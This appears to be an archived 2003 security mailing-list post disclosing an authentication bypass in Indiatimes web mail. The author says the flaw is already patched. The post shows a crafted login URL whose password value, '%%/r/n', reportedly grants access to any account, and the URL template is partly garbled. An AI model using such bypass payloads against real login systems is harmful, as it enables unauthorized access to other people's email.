Indiatimes.com Mail Flaw

From: Mandar Punaskar (mandarp02_at_yahoo.com)
Date: 05/01/03

  • Next message: Security Alert: "SSRT3496 Potential Security Vulnerability in rexec"
    Date: 1 May 2003 03:51:40 -0700
    
    

    Hi all,

    I discovered a security flaw in indiatimes.com (India's biggest
    web-based mail provider, Timesgroup), which allows logging in to any
    indiatimes email account without a password: http://www.indiatimes.com

    the trick:

    The URL to which the form is submitted:
    http://mail.indiatimes.com/cgi-bin/login? login
    name>&password=<your password>

    just replace it with
    http://mail.indiatimes.com/cgi-bin/login? login
    name>&password=%%/r/n

    and that's it, it will let you in.

    But wait, guys:
    I have already informed indiatimes of this, and they have patched
    their system.

    Contact me for the details: mandarp02 at yahoo.com

    Happy hacking.....

    Mandar Punaskar

